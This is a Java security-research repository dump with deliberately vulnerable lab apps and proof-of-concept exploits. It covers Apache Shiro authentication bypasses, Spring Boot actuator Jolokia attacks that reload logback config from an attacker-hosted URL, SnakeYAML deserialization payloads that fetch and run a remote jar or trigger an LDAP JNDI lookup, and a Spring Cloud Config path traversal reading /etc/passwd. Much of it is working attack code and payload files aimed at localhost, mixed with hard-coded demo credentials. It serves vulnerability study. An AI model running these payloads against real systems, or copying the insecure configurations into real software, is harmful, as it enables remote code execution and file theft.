 * Form-login endpoint that authenticates the current Shiro {@link Subject}.
 *
 * @author threedr3am
 */
@RestController
public class LoginController {

    /**
     * Authenticates the caller with a username/password token.
     *
     * @param username resolved by Spring from the request parameter of the same name
     * @param password resolved the same way; arrives in plaintext in the request body
     * @return "登录成功!" on success, "登录失败!" on any AuthenticationException
     */
    @RequestMapping(value = "/login", method = RequestMethod.POST)
    public String login(String username, String password) {
        Subject subject = SecurityUtils.getSubject();
        try {
            subject.login(new UsernamePasswordToken(username, password));
            return "登录成功!";
        } catch (AuthenticationException e) {
            // All authentication failures collapse into one response body; the
            // stack trace goes to stderr, not the application log.
            e.printStackTrace();
            return "登录失败!";
        }

    }
}
// ---- /shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java ----
package me.threedr3am.bug.shiro.bypass.auth.realm;

import org.apache.shiro.authc.*;
import org.apache.shiro.authz.AuthorizationInfo;
import
org.apache.shiro.realm.AuthorizingRealm; 6 | import org.apache.shiro.subject.PrincipalCollection; 7 | 8 | /** 9 | * @author threedr3am 10 | */ 11 | public class MyRealm extends AuthorizingRealm { 12 | @Override 13 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) { 14 | return null; 15 | } 16 | @Override 17 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException { 18 | String username = (String) token.getPrincipal(); 19 | if (!"threedr3am".equals(username)) { 20 | throw new UnknownAccountException("账户不存在!"); 21 | } 22 | return new SimpleAuthenticationInfo(username, "123456", getName()); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /shiro/auth-bypass-shiro-1-8-0/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 1.5.22.RELEASE 9 | 10 | 11 | 4.0.0 12 | 13 | auth-bypass-shiro-1-8-0 14 | 15 | 16 | 8 17 | 8 18 | 19 | 20 | 21 | 22 | org.springframework.boot 23 | spring-boot-starter-web 24 | 25 | 26 | 27 | org.apache.shiro 28 | shiro-web 29 | 1.8.0 30 | 31 | 32 | org.apache.shiro 33 | shiro-spring 34 | 1.8.0 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java: -------------------------------------------------------------------------------- 1 | package me.threedr3am.bug.shiro.bypass.auth; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Application { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(Application.class, args); 11 | } 12 | 13 | } 
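// ---- /shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java ----
package me.threedr3am.bug.shiro.bypass.auth.config;

import me.threedr3am.bug.shiro.bypass.auth.realm.MyRealm;
import org.apache.shiro.mgt.SecurityManager;
import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

import java.util.LinkedHashMap;
import java.util.Map;

/**
 * Wires a single-realm Shiro web security manager and the servlet filter chain.
 *
 * This variant defines exactly one chain entry, "/bypass/*/index" -> authc, and
 * sets no login URL. There is no ("/**", "authc") catch-all, so every other
 * path (including /login) passes through without any Shiro filter.
 *
 * @author threedr3am
 */
@Configuration
public class ShiroConfig {
    /** @return the demo realm (see MyRealm in this module: one hard-coded account) */
    @Bean
    MyRealm myRealm() {
        return new MyRealm();
    }

    /** @return a DefaultWebSecurityManager backed by {@link #myRealm()} */
    @Bean
    SecurityManager securityManager() {
        DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
        manager.setRealm(myRealm());
        return manager;
    }

    /**
     * Builds the ShiroFilterFactoryBean with the single-entry filter-chain map.
     *
     * @return the configured factory bean
     */
    @Bean
    ShiroFilterFactoryBean shiroFilterFactoryBean() {
        ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
        bean.setSecurityManager(securityManager());
        // Typed map instead of the raw LinkedHashMap: setFilterChainDefinitionMap
        // takes Map<String, String>. Same single entry.
        Map<String, String> map = new LinkedHashMap<String, String>();
        map.put("/bypass/*/index", "authc");
        bean.setFilterChainDefinitionMap(map);
        return bean;
    }
}
// ---- /shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java ----
package me.threedr3am.bug.shiro.bypass.auth.controller;

import org.springframework.web.bind.annotation.*;

/**
 *
 * curl http://127.0.0.1:8080/bypass/threedr3am/index.html
 *
 * @author threedr3am
 */
@RestController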
public class BypassTestController {

    /**
     * Handles GET /bypass/{id}/index. The Spring mapping and the Shiro chain
     * pattern in this module's ShiroConfig are written separately; whether a
     * particular request form hits both is decided by those two matchers, not
     * by this method.
     *
     * @param id the path segment between /bypass/ and /index
     * @return "bypass -> " followed by the id
     */
    @RequestMapping(value = "/bypass/{id}/index", method = RequestMethod.GET)
    public String bypass(@PathVariable("id") String id) {
        return "bypass -> " + id;
    }

}
// ---- /shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java ----
package me.threedr3am.bug.shiro.bypass.auth.controller;

import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

/**
 * Form-login endpoint that authenticates the current Shiro {@link Subject}.
 *
 * @author threedr3am
 */
@RestController
public class LoginController {

    /**
     * Authenticates the caller with a username/password token.
     *
     * @param username resolved by Spring from the request parameter of the same name
     * @param password resolved the same way; arrives in plaintext in the request body
     * @return "登录成功!" on success, "登录失败!" on any AuthenticationException
     */
    @RequestMapping(value = "/login", method = RequestMethod.POST)
    public String login(String username, String password) {
        Subject subject = SecurityUtils.getSubject();
        try {
            subject.login(new UsernamePasswordToken(username, password));
            return "登录成功!";
        } catch (AuthenticationException e) {
            // All authentication failures collapse into one response body; the
            // stack trace goes to stderr, not the application log.
            e.printStackTrace();
            return "登录失败!";
        }

    }
}
// ---- /shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java ----
package me.threedr3am.bug.shiro.bypass.auth.realm;

import org.apache.shiro.authc.*;
import org.apache.shiro.authz.AuthorizationInfo;
import org.apache.shiro.realm.AuthorizingRealm;
import
org.apache.shiro.subject.PrincipalCollection; 7 | 8 | /** 9 | * @author threedr3am 10 | */ 11 | public class MyRealm extends AuthorizingRealm { 12 | @Override 13 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) { 14 | return null; 15 | } 16 | @Override 17 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException { 18 | String username = (String) token.getPrincipal(); 19 | if (!"threedr3am".equals(username)) { 20 | throw new UnknownAccountException("账户不存在!"); 21 | } 22 | return new SimpleAuthenticationInfo(username, "123456", getName()); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /shiro/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | learn-java-bug 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | shiro 13 | pom 14 | 15 | auth-bypass-shiro-1-5-3 16 | auth-bypass-shiro-1-5-1 17 | auth-bypass-shiro-1-7-1 18 | auth-bypass-shiro-1-4-1 19 | auth-bypass-shiro-1-8-0 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /spring/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | learn-java-bug 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | spring 13 | pom 14 | 15 | spring-boot-actuator-bug 16 | spring-cloud-config-server-CVE-2020-5410 17 | spring-data-mongodb-spel-CVE-2022-22980 18 | spring-uricomponentsbuilder 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/README.md: -------------------------------------------------------------------------------- 1 | ### Spring Boot和Spring Cloud版本匹配参考 2 | 3 | Spring Boot : Spring Cloud 4 | - 1.2.x : Angel版本 (snake-yaml、jolokia pass) 5 | - 1.3.x : Brixton版本 (jolokia pass) 6 | - 1.4.x : Camden版本 (snake-yaml、jolokia pass) 7 | - 1.5.x : 
Dalston版本、Edgware版本 (snake-yaml、jolokia pass) (need to set management:security:enabled: false) 8 | - 2.0.x : Finchley版本 (hikariCP+h2 pass) (need to set management:security:enabled: false, management:endpoint:restart:enabled: true, management:endpoints:web:exposure:include: env,restart) 9 | - 2.1.x : Greenwich.SR2 10 | 11 | https://mvnrepository.com/artifact/org.springframework.cloud/spring-cloud-dependencies -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.2/src/main/java/com/threedr3am/bug/spring/actuator/Application.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.actuator; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | /** 7 | * @author threedr3am 8 | */ 9 | @SpringBootApplication 10 | public class Application { 11 | 12 | public static void main(String[] args) { 13 | SpringApplication.run(Application.class, args); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.2/src/main/java/com/threedr3am/bug/spring/actuator/JolokiaAttackForLogback.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.actuator; 2 | 3 | import com.threedr3am.bug.common.server.LdapServer; 4 | import org.apache.http.client.methods.CloseableHttpResponse; 5 | import org.apache.http.client.methods.HttpGet; 6 | import org.apache.http.impl.client.CloseableHttpClient; 7 | import org.apache.http.impl.client.HttpClientBuilder; 8 | import org.apache.http.impl.client.HttpClients; 9 | 10 | /** 11 | * copy logback-evil.xml to http server root 12 | * 13 | * @author threedr3am 14 | */ 15 | public class JolokiaAttackForLogback { 16 | 17 | static { 18 | LdapServer.run(); 19 | } 20 | 21 | public static void 
main(String[] args) { 22 | String target = "http://localhost:8080"; 23 | String evilXML = "http:!/!/127.0.0.1:80!/logback-evil.xml"; 24 | HttpGet httpGet = new HttpGet(target + "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/" + evilXML); 25 | try { 26 | HttpClientBuilder httpClientBuilder = HttpClients 27 | .custom() 28 | .disableRedirectHandling() 29 | .disableCookieManagement() 30 | ; 31 | 32 | CloseableHttpClient httpClient = null; 33 | CloseableHttpResponse response = null; 34 | try { 35 | httpClient = httpClientBuilder.build(); 36 | response = httpClient.execute(httpGet); 37 | } finally { 38 | response.close(); 39 | httpClient.close(); 40 | } 41 | } catch (Exception e) { 42 | e.printStackTrace(); 43 | } 44 | 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.2/src/main/resources/logback-evil.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.2/src/main/resources/logback.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | true 4 | 5 | [%thread] %highlight(%-5level) %cyan(%logger{15}) - %msg %n 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.2/src/main/resources/snake-yaml-evil.yml: -------------------------------------------------------------------------------- 1 | !!javax.script.ScriptEngineManager [ 2 | !!java.net.URLClassLoader [[ 3 | !!java.net.URL ["http://127.0.0.1:80/common-1.0-SNAPSHOT.jar"] 4 | ]] 5 | ] -------------------------------------------------------------------------------- 
/spring/spring-boot-actuator-bug/actuator-1.3/src/main/java/com/threedr3am/bug/spring/actuator/Application.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.actuator; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | /** 7 | * @author threedr3am 8 | */ 9 | @SpringBootApplication 10 | public class Application { 11 | 12 | public static void main(String[] args) { 13 | SpringApplication.run(Application.class, args); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.3/src/main/resources/logback-evil.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.3/src/main/resources/logback.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | true 4 | 5 | [%thread] %highlight(%-5level) %cyan(%logger{15}) - %msg %n 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.3/src/main/resources/snake-yaml-evil.yml: -------------------------------------------------------------------------------- 1 | !!javax.script.ScriptEngineManager [ 2 | !!java.net.URLClassLoader [[ 3 | !!java.net.URL ["http://127.0.0.1:80/common-1.0-SNAPSHOT.jar"] 4 | ]] 5 | ] -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.4/src/main/java/com/threedr3am/bug/spring/actuator/Application.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.actuator; 2 | 3 | import org.springframework.boot.SpringApplication; 4 
| import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.cloud.netflix.eureka.EnableEurekaClient; 6 | 7 | /** 8 | * @author threedr3am 9 | */ 10 | @EnableEurekaClient 11 | @SpringBootApplication 12 | public class Application { 13 | 14 | public static void main(String[] args) { 15 | SpringApplication.run(Application.class, args); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.4/src/main/java/com/threedr3am/bug/spring/actuator/JolokiaAttackForLogback.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.actuator; 2 | 3 | import com.threedr3am.bug.common.server.LdapServer; 4 | import org.apache.http.client.methods.CloseableHttpResponse; 5 | import org.apache.http.client.methods.HttpGet; 6 | import org.apache.http.impl.client.CloseableHttpClient; 7 | import org.apache.http.impl.client.HttpClientBuilder; 8 | import org.apache.http.impl.client.HttpClients; 9 | 10 | /** 11 | * copy logback-evil.xml to http server root 12 | * 13 | * @author threedr3am 14 | */ 15 | public class JolokiaAttackForLogback { 16 | 17 | static { 18 | LdapServer.run(); 19 | } 20 | 21 | public static void main(String[] args) { 22 | String target = "http://localhost:8080"; 23 | String evilXML = "http:!/!/127.0.0.1:80!/logback-evil.xml"; 24 | HttpGet httpGet = new HttpGet(target + "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/" + evilXML); 25 | try { 26 | HttpClientBuilder httpClientBuilder = HttpClients 27 | .custom() 28 | .disableRedirectHandling() 29 | .disableCookieManagement() 30 | ; 31 | 32 | CloseableHttpClient httpClient = null; 33 | CloseableHttpResponse response = null; 34 | try { 35 | httpClient = httpClientBuilder.build(); 36 | response = httpClient.execute(httpGet); 37 | } finally { 38 | response.close(); 39 | 
httpClient.close(); 40 | } 41 | } catch (Exception e) { 42 | e.printStackTrace(); 43 | } 44 | 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.4/src/main/resources/logback-evil.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.4/src/main/resources/logback.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | true 4 | 5 | [%thread] %highlight(%-5level) %cyan(%logger{15}) - %msg %n 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.4/src/main/resources/snake-yaml-evil.yml: -------------------------------------------------------------------------------- 1 | !!javax.script.ScriptEngineManager [ 2 | !!java.net.URLClassLoader [[ 3 | !!java.net.URL ["http://127.0.0.1:80/common-1.0-SNAPSHOT.jar"] 4 | ]] 5 | ] -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.5/src/main/java/com/threedr3am/bug/spring/actuator/Application.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.actuator; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | /** 7 | * @author threedr3am 8 | */ 9 | @SpringBootApplication 10 | public class Application { 11 | 12 | public static void main(String[] args) { 13 | SpringApplication.run(Application.class, args); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- 
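/spring/spring-boot-actuator-bug/actuator-1.5/src/main/java/com/threedr3am/bug/spring/actuator/JolokiaAttackForLogback.java: --------------------------------------------------------------------------------
package com.threedr3am.bug.spring.actuator;

import com.threedr3am.bug.common.server.LdapServer;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClientBuilder;
import org.apache.http.impl.client.HttpClients;

/**
 * Proof of concept against a Spring Boot 1.5 actuator with management security switched off (see
 * this module's application.yml): the /jolokia endpoint lets a caller invoke MBean operations over
 * HTTP, and logback's JMXConfigurator.reloadByURL reloads the logging configuration from any URL
 * the caller names -- here logback-evil.xml.
 *
 * Setup: copy logback-evil.xml to the root of an HTTP server listening on 127.0.0.1:80. The static
 * initializer also starts the project's LdapServer, presumably the JNDI endpoint that
 * logback-evil.xml points at (its contents are not visible here). Run this only against a lab
 * target you own; the defence is to keep actuator endpoints authenticated or not exposed at all.
 *
 * Usage: an optional first argument overrides the default target base URL.
 *
 * @author threedr3am
 */
public class JolokiaAttackForLogback {

  static {
    LdapServer.run();
  }

  public static void main(String[] args) {
    String target = args.length > 0 ? args[0] : "http://localhost:8080";
    // Jolokia path-parameter escaping: a "/" inside an argument is written as "!/".
    String evilXML = "http:!/!/127.0.0.1:80!/logback-evil.xml";
    HttpGet httpGet = new HttpGet(target
        + "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/"
        + evilXML);
    HttpClientBuilder httpClientBuilder = HttpClients
        .custom()
        .disableRedirectHandling()
        .disableCookieManagement();

    // try-with-resources replaces the manual finally block, which called close() on `response`
    // and `httpClient` unconditionally: when build() or execute() threw, both were still null and
    // the resulting NullPointerException masked the real failure (e.g. connection refused).
    try (CloseableHttpClient httpClient = httpClientBuilder.build();
        CloseableHttpResponse response = httpClient.execute(httpGet)) {
      // The only feedback the PoC gets is the HTTP status; the payload itself fires server-side.
      System.out.println(response.getStatusLine());
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
}
--------------------------------------------------------------------------------
/spring/spring-boot-actuator-bug/actuator-1.5/src/main/java/com/threedr3am/bug/spring/actuator/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * spring cloud Dalston版本后,需要关闭management.security.enabled才能POST /env 4 | *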
5 | * @author threedr3am 6 | */ 7 | package com.threedr3am.bug.spring.actuator; -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.5/src/main/resources/application.yml: -------------------------------------------------------------------------------- 1 | management: 2 | security: 3 | enabled: false -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.5/src/main/resources/logback-evil.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.5/src/main/resources/logback.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | true 4 | 5 | [%thread] %highlight(%-5level) %cyan(%logger{15}) - %msg %n 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-1.5/src/main/resources/snake-yaml-evil.yml: -------------------------------------------------------------------------------- 1 | !!javax.script.ScriptEngineManager [ 2 | !!java.net.URLClassLoader [[ 3 | !!java.net.URL ["http://127.0.0.1:80/common-1.0-SNAPSHOT.jar"] 4 | ]] 5 | ] -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-2.0/src/main/java/com/threedr3am/bug/spring/actuator/Application.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.actuator; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | /** 7 | * @author threedr3am 8 | */ 9 | @SpringBootApplication 10 | public class Application { 11 | 12 | public static void main(String[] args) { 13 
| SpringApplication.run(Application.class, args); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-2.0/src/main/java/com/threedr3am/bug/spring/actuator/package-info.java: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * spring cloud Finchley版本后,关闭management.security.enabled以及指定开放endpoint才能攻击 4 | * 5 | * @author threedr3am 6 | */ 7 | package com.threedr3am.bug.spring.actuator; -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-2.0/src/main/resources/application.yml: -------------------------------------------------------------------------------- 1 | management: 2 | security: 3 | enabled: false 4 | endpoint: 5 | restart: 6 | enabled: true 7 | endpoints: 8 | web: 9 | exposure: 10 | include: env,restart 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/actuator-2.0/src/main/resources/logback.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | true 4 | 5 | [%thread] %highlight(%-5level) %cyan(%logger{15}) - %msg %n 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | spring 7 | com.xyh 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | spring-boot-actuator-bug 13 | pom 14 | 15 | 16 | org.yaml 17 | snakeyaml 18 | 1.16 19 | 20 | 21 | 22 | com.xyh 23 | common 24 | 1.0-SNAPSHOT 25 | 26 | 27 | -------------------------------------------------------------------------------- /spring/spring-boot-actuator-bug/src/main/java/com/threedr3am/bug/spring/actuator/snakeyaml/A.java: 
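--------------------------------------------------------------------------------
package com.threedr3am.bug.spring.actuator.snakeyaml;

/**
 * Marker class whose constructor prints when it runs; used to show that SnakeYAML instantiates
 * whatever class a "!!" tag names.
 *
 * @author xuanyh
 */
public class A {

  public A(String s) {
    System.out.println("call A(\"" + s + "\")...");
  }
}
--------------------------------------------------------------------------------
/spring/spring-boot-actuator-bug/src/main/java/com/threedr3am/bug/spring/actuator/snakeyaml/SnakeYamlTest.java: --------------------------------------------------------------------------------
package com.threedr3am.bug.spring.actuator.snakeyaml;

import com.threedr3am.bug.common.server.LdapServer;
import java.util.HashMap;
import java.util.Map;
import org.yaml.snakeyaml.Yaml;

/**
 * Demonstrates why {@code new Yaml().load(untrustedText)} is remote code execution: the default
 * constructor resolves "!!fully.qualified.ClassName" tags to arbitrary classes on the classpath and
 * instantiates them. For untrusted input use {@code new Yaml(new SafeConstructor())} or a
 * constructor restricted to an allow-list of types; none of the loads below is safe.
 *
 * @author threedr3am
 */
public class SnakeYamlTest {

  public static void main(String[] args) {
    testNewInstance();
    testAttack();
    testAttack2();
  }

  /** Round-trips a map holding an {@link A} and shows that load() calls A's constructor. */
  public static void testNewInstance() {
    Yaml yaml = new Yaml();
    Map<String, Object> map = new HashMap<>();
    map.put("111", new A("xxx"));
    System.out.println(yaml.dump(map));
    // Parsing this document instantiates A("threedr3am") -- no registration or allow-list involved.
    yaml.load("!!com.threedr3am.bug.spring.actuator.snakeyaml.A [\"threedr3am\"]");
  }

  /**
   * ScriptEngineManager(ClassLoader) with a URLClassLoader pointing at a remote jar: the jar's
   * ScriptEngineFactory service provider is loaded (and its code run) while the manager is built.
   * Requires an HTTP server on 127.0.0.1:80 serving common-1.0-SNAPSHOT.jar.
   */
  public static void testAttack() {
    Yaml yaml = new Yaml();
    yaml.load("'111': !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ['http://127.0.0.1:80/common-1.0-SNAPSHOT.jar']]]]");
  }

  /**
   * JNDI variant: setting autoCommit on a JdbcRowSetImpl makes it connect to dataSourceName, an
   * LDAP URL served by the project's LdapServer.
   */
  public static void testAttack2() {
    new Thread(() -> LdapServer.run()).start();
    // NOTE(review): the LDAP server is started on another thread and load() follows immediately;
    // whether the listener is up in time depends on LdapServer.run() (not visible here), so the
    // lookup can race and fail on a slow start.
    Yaml yaml = new Yaml();
    yaml.load("!!com.sun.rowset.JdbcRowSetImpl\n dataSourceName: ldap://127.0.0.1:43658/Calc\n autoCommit: true");
  }

}
--------------------------------------------------------------------------------
/spring/spring-cloud-config-server-CVE-2019-3799/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 |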
org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.0.3.RELEASE 9 | 10 | 11 | 4.0.0 12 | 13 | spring-cloud-config-server-CVE-2019-3799 14 | 15 | 16 | 17 | org.springframework.boot 18 | spring-boot-starter 19 | 20 | 21 | 22 | org.springframework.cloud 23 | spring-cloud-config-server 24 | 2.0.3.RELEASE 25 | 26 | 27 | 28 | 29 | 30 | 31 | org.springframework.boot 32 | spring-boot-maven-plugin 33 | 34 | true 35 | 36 | 37 | 38 | 39 | --------------------------------------------------------------------------------
/spring/spring-cloud-config-server-CVE-2019-3799/src/main/java/com/threedr3am/bug/spring/config/server/Application.java: --------------------------------------------------------------------------------
package com.threedr3am.bug.spring.config.server;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.cloud.config.server.EnableConfigServer;

/**
 * Boots a Spring Cloud Config Server (2.0.3.RELEASE per this module's pom) as the vulnerable
 * target for CVE-2019-3799.
 *
 * @author threedr3am
 */
@EnableConfigServer
@SpringBootApplication
public class Application {

  public static void main(String[] args) {
    SpringApplication.run(Application.class, args);
  }
}
--------------------------------------------------------------------------------
/spring/spring-cloud-config-server-CVE-2019-3799/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java: --------------------------------------------------------------------------------
/**
 * CVE-2019-3799: directory traversal in Spring Cloud Config Server.
 *
 * Trigger point: org.springframework.cloud.config.server.resource.ResourceController
 *
 * The third path variable, i.e. {label} in /{application}/{profile}/{label}/..%252f..%252fetc%252fpasswd,
 * must name an existing branch; "master" normally exists, so the request becomes
 * /threedr3am/dev/master/..%252f..%252f..%252f..%252f..%252f../etc/passwd
 * (%252f is a double-encoded "/", presumably so the ".." survives the container's own path
 * normalisation and is only decoded by the config server -- confirm).
 *
 * NOTE(review): the branch requirement describes the git backend, but this module's
 * application.yml activates the "native" profile with search-locations file:///tmp and the git
 * uri commented out; confirm whether {label} still has to exist in that mode.
 *
 * @author threedr3am
 */
package com.threedr3am.bug.spring.config.server; --------------------------------------------------------------------------------
/spring/spring-cloud-config-server-CVE-2019-3799/src/main/resources/application.yml: -------------------------------------------------------------------------------- 1 | spring: 2 | profiles: 3 | active: native 4 | cloud: 5 | config: 6 | server: 7 | native: 8 | search-locations: file:///tmp 9 | # git: 10 | # uri: https://github.com/threedr3am/share-project 11 | server: 12 | port: 9988 13 | -------------------------------------------------------------------------------- /spring/spring-cloud-config-server-CVE-2020-5405/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.2.1.RELEASE 9 | 10 | 11 | 4.0.0 12 | 13 | spring-cloud-config-server-CVE-2020-5405 14 | 15 | 16 | 17 | org.springframework.boot 18 | spring-boot-starter 19 | 20 | 21 | 22 | org.springframework.cloud 23 | spring-cloud-config-server 24 | 2.2.1.RELEASE 25 | 26 | 27 | 28 | 29 | 30 | 31 | org.springframework.boot 32 | spring-boot-maven-plugin 33 | 34 | true 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /spring/spring-cloud-config-server-CVE-2020-5405/src/main/java/com/threedr3am/bug/spring/config/server/Application.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.spring.config.server; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.cloud.config.server.EnableConfigServer; 6 | 7 | /** 8 | * @author threedr3am 9 | */ 10 | @EnableConfigServer 11 | @SpringBootApplication 12 | public class Application { 13 | 14 | public static void main(String[] args) { 15 | SpringApplication.run(Application.class, args); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- 
/spring/spring-cloud-config-server-CVE-2020-5405/src/main/resources/application.yml: -------------------------------------------------------------------------------- 1 | spring: 2 | profiles: 3 | active: native 4 | cloud: 5 | config: 6 | server: 7 | native: 8 | search-locations: file:///tmp/{label},file:///tmp/{application},file:///tmp/{profiles} 9 | server: 10 | port: 9988 11 | -------------------------------------------------------------------------------- /spring/spring-cloud-config-server-CVE-2020-5410/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.2.2.RELEASE 9 | 10 | 11 | 4.0.0 12 | spring-cloud-config-server-CVE-2020-5410 13 | 14 | 15 | 16 | 17 | org.springframework.boot 18 | spring-boot-starter 19 | 20 | 21 | 22 | org.springframework.cloud 23 | spring-cloud-config-server 24 | 2.2.2.RELEASE 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /spring/spring-cloud-config-server-CVE-2020-5410/src/main/java/com/threedr3am/bug/spring/config/server/Application.java: -------------------------------------------------------------------------------- 1 